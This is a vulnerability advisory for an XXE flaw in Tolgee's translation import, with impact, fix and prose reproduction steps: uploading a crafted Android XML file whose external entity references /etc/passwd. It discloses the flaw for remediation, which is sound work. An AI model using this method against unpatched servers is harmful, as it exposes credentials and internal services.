Tolgee XML External Entity Injection Vulnerability in Translation Import

A critical XML External Entity (XXE) injection vulnerability has been identified in Tolgee, an open-source localization platform, prior to version 3.166.3. The issue arises in the XML parsers used for importing Android XML resources and .resx files, which do not disable external entity processing. This vulnerability allows an authenticated user with permission to import translation files to read arbitrary files from the server and make server-side requests to internal services. The flaw has been confirmed to affect both self-hosted instances and the cloud platform at app.tolgee.io.

Impact

Exploitation of this vulnerability allows for XXE injection, where external entities are processed, potentially leading to the disclosure of sensitive files, such as application configuration files containing database credentials or other sensitive information. Additionally, it could be used to read environment variables from the server or perform server-side requests to internal services or cloud metadata endpoints.

Reproduction

To reproduce this vulnerability, log in to a Tolgee project and upload a crafted Android XML resource file that includes an external entity reference pointing to a sensitive file, such as /etc/passwd. After completing the import, the translation for the imported key will reveal the contents of the referenced file, demonstrating the XXE vulnerability.

Remediation

Users should update to Tolgee version 3.166.3 or later, where this vulnerability has been fixed. For those maintaining their own instances, ensure that all XML parsers disable external entity processing before importing files.